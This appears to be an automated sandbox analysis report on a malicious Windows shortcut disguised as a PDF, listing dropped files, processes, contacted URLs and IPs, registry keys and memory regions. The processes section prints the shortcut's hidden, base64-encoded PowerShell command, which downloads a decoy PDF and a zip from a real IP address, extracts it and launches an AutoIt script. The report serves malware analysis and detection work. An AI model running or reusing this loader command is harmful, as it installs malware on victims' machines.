Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Integration.pdf www.skype.com.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has
command line arguments, Icon number=0, Archive, ctime=Thu Nov 14 16:00:32 2024, mtime=Mon Nov 18 14:07:07 2024, atime=Thu
Nov 14 16:00:32 2024, length=245760, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x7fb962f7, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\3f99399e-7832-4a8e-b6ed-ba4483bf1520.tmp
|
JSON data
|
modified
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
|
ASCII text
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241119181115Z-228.bmp
|
PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
|
Certificate, Version=3
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
|
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8,
version-valid-for 25
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
|
SQLite Rollback Journal
|
dropped
|
||
|
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSIbd7e6.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hff1bw0j.uwu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrlfql21.ev0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-19 13-11-12-053.log
|
ASCII text, with very long lines (393)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
|
ASCII text, with very long lines (393), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\036632e1-1861-4f21-b384-44c930bda892.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\409bb123-804d-4b70-ac99-22a639541ef2.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\712d0de8-0c31-4ddc-9819-7ad9e4f3b121.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\acrocef_low\e8e72f5f-6b2c-458e-b726-d41c9df7fd2b.tmp
|
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\vmapi.pdf
|
PDF document, version 1.4, 5 pages
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 42 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGFwcGRhdGE9W1N5c3RlbS5FbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ0FwcGxpY2F0aW9uRGF0YScpDQpJbnZva2UtV2ViUmVxdWVzdCAnaHR0cDovLzIuNTguNTYuMjQzL3ZtYXBpLnBkZicgLU91dEZpbGUgIiRhcHBkYXRhXHZtYXBpLnBkZiI7IFN0YXJ0LVByb2Nlc3MgIiRhcHBkYXRhXHZtYXBpLnBkZiINCiMgUE9SVFVHQUwNCkludm9rZS1XZWJSZXF1ZXN0ICdodHRwOi8vMi41OC41Ni4yNDMva2dodHllZC56aXAnIC1PdXRGaWxlICIkYXBwZGF0YVxrZ2h0eWVkLnppcCINCiMgUE9SVFVHQUwgRlJBTkNFDQpBZGQtVHlwZSAtQXNzZW1ibHlOYW1lIFN5c3RlbS5JTy5Db21wcmVzc2lvbi5GaWxlU3lzdGVtDQpbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiRhcHBkYXRhXGtnaHR5ZWQuemlwIiwgJGFwcGRhdGEpDQpTdGFydC1Qcm9jZXNzICIkYXBwZGF0YVxBdXRvSXQzLmV4ZSIgIiRhcHBkYXRhXHNjcmlwdC5hM3giDQojIFBPUlRVR0FMIEJSQUJVUw0K'))
| Invoke-Expression"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGFwcGRhdGE9W1N5c3RlbS5FbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ0FwcGxpY2F0aW9uRGF0YScpDQpJbnZva2UtV2ViUmVxdWVzdCAnaHR0cDovLzIuNTguNTYuMjQzL3ZtYXBpLnBkZicgLU91dEZpbGUgIiRhcHBkYXRhXHZtYXBpLnBkZiI7IFN0YXJ0LVByb2Nlc3MgIiRhcHBkYXRhXHZtYXBpLnBkZiINCiMgUE9SVFVHQUwNCkludm9rZS1XZWJSZXF1ZXN0ICdodHRwOi8vMi41OC41Ni4yNDMva2dodHllZC56aXAnIC1PdXRGaWxlICIkYXBwZGF0YVxrZ2h0eWVkLnppcCINCiMgUE9SVFVHQUwgRlJBTkNFDQpBZGQtVHlwZSAtQXNzZW1ibHlOYW1lIFN5c3RlbS5JTy5Db21wcmVzc2lvbi5GaWxlU3lzdGVtDQpbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiRhcHBkYXRhXGtnaHR5ZWQuemlwIiwgJGFwcGRhdGEpDQpTdGFydC1Qcm9jZXNzICIkYXBwZGF0YVxBdXRvSXQzLmV4ZSIgIiRhcHBkYXRhXHNjcmlwdC5hM3giDQojIFBPUlRVR0FMIEJSQUJVUw0K'))
| Invoke-Expression"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\vmapi.pdf"
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
|
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService
--lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0"
--lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076
--field-trial-handle=1636,i,14726364720593086116,8068098665714155558,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker
/prefetch:8
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://x1.i.lencr.org/
|
unknown
|
||
|
http://2.58.56.243
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://2.58.56.243/kghtyed.zipX
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2/C:
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://2.58.56.243/vmapi.pdfX
|
unknown
|
||
|
http://2.58.56.243/vmapi.pdf
|
2.58.56.243
|
||
|
http://2.58.56.243/kghtyed.zip
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
15.164.165.52.in-addr.arpa
|
unknown
|
||
|
x1.i.lencr.org
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
2.58.56.243
|
unknown
|
Netherlands
|
||
|
96.17.64.171
|
unknown
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
F3A85FE000
|
unkown
|
page readonly
|
||
|
1BC01F7C000
|
trusted library allocation
|
page read and write
|
||
|
2E33FF04000
|
heap
|
page read and write
|
||
|
1BC6A630000
|
heap
|
page read and write
|
||
|
1BC6A7AB000
|
heap
|
page read and write
|
||
|
7FFB4B4A3000
|
trusted library allocation
|
page read and write
|
||
|
B86AC7E000
|
stack
|
page read and write
|
||
|
7FFB4B310000
|
trusted library allocation
|
page read and write
|
||
|
2E33A929000
|
heap
|
page read and write
|
||
|
1C46BF99000
|
heap
|
page read and write
|
||
|
2E33A8A1000
|
heap
|
page read and write
|
||
|
2E33B540000
|
trusted library allocation
|
page read and write
|
||
|
1BC68670000
|
heap
|
page read and write
|
||
|
2E33FCE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B450000
|
trusted library allocation
|
page read and write
|
||
|
2E33B6D0000
|
trusted library section
|
page readonly
|
||
|
B86B0FE000
|
stack
|
page read and write
|
||
|
2E33FCC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4E0000
|
trusted library allocation
|
page read and write
|
||
|
2E33A82F000
|
heap
|
page read and write
|
||
|
F3A7BFE000
|
stack
|
page read and write
|
||
|
2E33FE00000
|
heap
|
page read and write
|
||
|
7FFB4B01B000
|
trusted library allocation
|
page read and write
|
||
|
F3A8AFE000
|
unkown
|
page readonly
|
||
|
7FFB4B1E2000
|
trusted library allocation
|
page read and write
|
||
|
7DF4506B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B2A0000
|
trusted library allocation
|
page read and write
|
||
|
2E33AFA0000
|
trusted library section
|
page read and write
|
||
|
1BC101B3000
|
trusted library allocation
|
page read and write
|
||
|
F3A857E000
|
stack
|
page read and write
|
||
|
1C46BFB1000
|
heap
|
page read and write
|
||
|
2E33FDB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B230000
|
trusted library allocation
|
page read and write
|
||
|
1BC686F0000
|
heap
|
page read and write
|
||
|
1C46BE53000
|
heap
|
page read and write
|
||
|
1BC685EA000
|
heap
|
page read and write
|
||
|
1BC6A89A000
|
heap
|
page read and write
|
||
|
F3A8CF9000
|
stack
|
page read and write
|
||
|
F3A867E000
|
stack
|
page read and write
|
||
|
F3A7EFE000
|
unkown
|
page readonly
|
||
|
B86BE8E000
|
stack
|
page read and write
|
||
|
B86B27D000
|
stack
|
page read and write
|
||
|
7FFB4B004000
|
trusted library allocation
|
page read and write
|
||
|
1BC68530000
|
heap
|
page read and write
|
||
|
2E33FF0C000
|
heap
|
page read and write
|
||
|
F3A8A7E000
|
stack
|
page read and write
|
||
|
1C46BE57000
|
heap
|
page read and write
|
||
|
7FFB4B340000
|
trusted library allocation
|
page read and write
|
||
|
1BC685EC000
|
heap
|
page read and write
|
||
|
1C46C006000
|
heap
|
page read and write
|
||
|
2E340030000
|
trusted library allocation
|
page read and write
|
||
|
2E33B201000
|
trusted library allocation
|
page read and write
|
||
|
F3A7AFE000
|
unkown
|
page readonly
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BC6B1F0000
|
heap
|
page read and write
|
||
|
2E33FD00000
|
trusted library allocation
|
page read and write
|
||
|
1BC6A4CA000
|
heap
|
page read and write
|
||
|
F3A84FE000
|
unkown
|
page readonly
|
||
|
2E33A879000
|
heap
|
page read and write
|
||
|
2E33FEEE000
|
heap
|
page read and write
|
||
|
B86ACFC000
|
stack
|
page read and write
|
||
|
1BC6A7D7000
|
heap
|
page read and write
|
||
|
7FFB4B1BA000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4D0000
|
trusted library allocation
|
page read and write
|
||
|
2E33B700000
|
trusted library section
|
page readonly
|
||
|
7FFB4B250000
|
trusted library allocation
|
page read and write
|
||
|
F3A8FFE000
|
unkown
|
page readonly
|
||
|
2E33FEC2000
|
heap
|
page read and write
|
||
|
1C46BEE1000
|
heap
|
page read and write
|
||
|
1BC6A7D4000
|
heap
|
page read and write
|
||
|
1BC68700000
|
heap
|
page read and write
|
||
|
F3A8DFE000
|
unkown
|
page readonly
|
||
|
2E33FD20000
|
trusted library allocation
|
page read and write
|
||
|
1BC6A4AC000
|
heap
|
page read and write
|
||
|
2E33B11A000
|
heap
|
page read and write
|
||
|
B86AA73000
|
stack
|
page read and write
|
||
|
1C46BEB9000
|
heap
|
page read and write
|
||
|
F3A82FE000
|
unkown
|
page readonly
|
||
|
1BC6A4AE000
|
heap
|
page read and write
|
||
|
2E33A813000
|
heap
|
page read and write
|
||
|
1BC6AFD0000
|
heap
|
page read and write
|
||
|
7FFB4B1A0000
|
trusted library allocation
|
page read and write
|
||
|
2E33A700000
|
heap
|
page read and write
|
||
|
1BC01632000
|
trusted library allocation
|
page read and write
|
||
|
1BC6B1F4000
|
heap
|
page read and write
|
||
|
1BC00C32000
|
trusted library allocation
|
page read and write
|
||
|
2E33FCE0000
|
trusted library allocation
|
page read and write
|
||
|
2E33A82B000
|
heap
|
page read and write
|
||
|
F3A877E000
|
stack
|
page read and write
|
||
|
1C46BEAE000
|
heap
|
page read and write
|
||
|
2E33FEC8000
|
heap
|
page read and write
|
||
|
7FFB4B377000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B4B0000
|
trusted library allocation
|
page read and write
|
||
|
1BC68765000
|
heap
|
page read and write
|
||
|
1BC6A7B9000
|
heap
|
page read and write
|
||
|
B86ADFD000
|
stack
|
page read and write
|
||
|
1BC6A280000
|
trusted library allocation
|
page read and write
|
||
|
B86BF0D000
|
stack
|
page read and write
|
||
|
7FFB4B4A0000
|
trusted library allocation
|
page read and write
|
||
|
1BC6AF10000
|
heap
|
page read and write
|
||
|
1BC68602000
|
heap
|
page read and write
|
||
|
2E33A902000
|
heap
|
page read and write
|
||
|
2E33FF02000
|
heap
|
page read and write
|
||
|
B86AE7D000
|
stack
|
page read and write
|
||
|
1BC6A710000
|
heap
|
page read and write
|
||
|
7FFB4B1C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BC00232000
|
trusted library allocation
|
page read and write
|
||
|
B86BE0F000
|
stack
|
page read and write
|
||
|
2E33A913000
|
heap
|
page read and write
|
||
|
1BC6867D000
|
heap
|
page read and write
|
||
|
2E340020000
|
trusted library allocation
|
page read and write
|
||
|
F3A897E000
|
stack
|
page read and write
|
||
|
2E33B15A000
|
heap
|
page read and write
|
||
|
1BC6ACC0000
|
heap
|
page read and write
|
||
|
1BC686D0000
|
trusted library allocation
|
page read and write
|
||
|
1BC686B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B1D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B002000
|
trusted library allocation
|
page read and write
|
||
|
1BC6AC70000
|
heap
|
page read and write
|
||
|
2E340080000
|
remote allocation
|
page read and write
|
||
|
1BC6A9F0000
|
heap
|
page read and write
|
||
|
2E33A87C000
|
heap
|
page read and write
|
||
|
F3A767B000
|
stack
|
page read and write
|
||
|
B86AAFE000
|
stack
|
page read and write
|
||
|
1BC6A90E000
|
heap
|
page read and write
|
||
|
2E33B6C0000
|
trusted library section
|
page readonly
|
||
|
2E33B113000
|
heap
|
page read and write
|
||
|
B86A7EE000
|
stack
|
page read and write
|
||
|
F3A88FE000
|
unkown
|
page readonly
|
||
|
7FFB4B3E4000
|
trusted library allocation
|
page read and write
|
||
|
1BC102EB000
|
trusted library allocation
|
page read and write
|
||
|
F3A7FFB000
|
stack
|
page read and write
|
||
|
7FFB4B003000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B270000
|
trusted library allocation
|
page read and write
|
||
|
1BC6A5D0000
|
heap
|
page execute and read and write
|
||
|
1BC685E2000
|
heap
|
page read and write
|
||
|
B86C08B000
|
stack
|
page read and write
|
||
|
1BC016E9000
|
trusted library allocation
|
page read and write
|
||
|
1BC0008C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B490000
|
trusted library allocation
|
page read and write
|
||
|
1BC6A814000
|
heap
|
page read and write
|
||
|
1BC686E0000
|
heap
|
page readonly
|
||
|
7FFB4B470000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B010000
|
trusted library allocation
|
page read and write
|
||
|
2E33BC50000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B000000
|
trusted library allocation
|
page read and write
|
||
|
2E33FEE5000
|
heap
|
page read and write
|
||
|
1BC686FC000
|
heap
|
page read and write
|
||
|
B86B07A000
|
stack
|
page read and write
|
||
|
7FFB4B290000
|
trusted library allocation
|
page read and write
|
||
|
F3A957E000
|
stack
|
page read and write
|
||
|
7FFB4B020000
|
trusted library allocation
|
page read and write
|
||
|
2E33B015000
|
heap
|
page read and write
|
||
|
7FFB4B2E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B460000
|
trusted library allocation
|
page read and write
|
||
|
2E33FE95000
|
heap
|
page read and write
|
||
|
1C46BE4F000
|
heap
|
page read and write
|
||
|
2E33A88F000
|
heap
|
page read and write
|
||
|
1BC6A76E000
|
heap
|
page read and write
|
||
|
7FFB4B2D0000
|
trusted library allocation
|
page read and write
|
||
|
2E33FCE1000
|
trusted library allocation
|
page read and write
|
||
|
F3A80FE000
|
unkown
|
page readonly
|
||
|
2E33B002000
|
heap
|
page read and write
|
||
|
7FFB4B360000
|
trusted library allocation
|
page read and write
|
||
|
2E33B000000
|
heap
|
page read and write
|
||
|
7FFB4B0B6000
|
trusted library allocation
|
page read and write
|
||
|
1BC6A878000
|
heap
|
page read and write
|
||
|
1BC6A4CE000
|
heap
|
page read and write
|
||
|
7FFB4B0E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E33A83F000
|
heap
|
page read and write
|
||
|
1C46BE30000
|
heap
|
page read and write
|
||
|
2E33A800000
|
heap
|
page read and write
|
||
|
1BC6A9F3000
|
heap
|
page read and write
|
||
|
B86ABFE000
|
stack
|
page read and write
|
||
|
7FFB4B350000
|
trusted library allocation
|
page read and write
|
||
|
1BC01BFE000
|
trusted library allocation
|
page read and write
|
||
|
B86AEF9000
|
stack
|
page read and write
|
||
|
2E33B11A000
|
heap
|
page read and write
|
||
|
1BC685E4000
|
heap
|
page read and write
|
||
|
B86B2FB000
|
stack
|
page read and write
|
||
|
1C46BF67000
|
heap
|
page read and write
|
||
|
7FFB4B300000
|
trusted library allocation
|
page read and write
|
||
|
2E33FEE0000
|
heap
|
page read and write
|
||
|
F3A7CFE000
|
unkown
|
page readonly
|
||
|
F3A87FE000
|
unkown
|
page readonly
|
||
|
7FFB4B3E2000
|
trusted library allocation
|
page read and write
|
||
|
2E33FE2E000
|
heap
|
page read and write
|
||
|
2E33A8FF000
|
heap
|
page read and write
|
||
|
7FFB4B374000
|
trusted library allocation
|
page read and write
|
||
|
1BC685AF000
|
heap
|
page read and write
|
||
|
1BC01C07000
|
trusted library allocation
|
page read and write
|
||
|
1BC10070000
|
trusted library allocation
|
page read and write
|
||
|
2E33A8B0000
|
heap
|
page read and write
|
||
|
7FFB4B05C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4B0B0000
|
trusted library allocation
|
page read and write
|
||
|
F3A89FE000
|
unkown
|
page readonly
|
||
|
1BC6A5E0000
|
heap
|
page execute and read and write
|
||
|
2E33FE42000
|
heap
|
page read and write
|
||
|
B86BCCE000
|
stack
|
page read and write
|
||
|
1BC68430000
|
heap
|
page read and write
|
||
|
1C46BF76000
|
heap
|
page read and write
|
||
|
F3A7DFC000
|
stack
|
page read and write
|
||
|
2E33FC50000
|
trusted library allocation
|
page read and write
|
||
|
B86AB7E000
|
stack
|
page read and write
|
||
|
7FFB4B480000
|
trusted library allocation
|
page read and write
|
||
|
2E33A720000
|
heap
|
page read and write
|
||
|
1C46BEC1000
|
heap
|
page read and write
|
||
|
2E33FE61000
|
heap
|
page read and write
|
||
|
2E33A891000
|
heap
|
page read and write
|
||
|
B86AD7F000
|
stack
|
page read and write
|
||
|
2E33FF0A000
|
heap
|
page read and write
|
||
|
2E33B102000
|
heap
|
page read and write
|
||
|
2E33B6B0000
|
trusted library section
|
page readonly
|
||
|
1C46C02D000
|
heap
|
page read and write
|
||
|
7FFB4B200000
|
trusted library allocation
|
page read and write
|
||
|
2E341000000
|
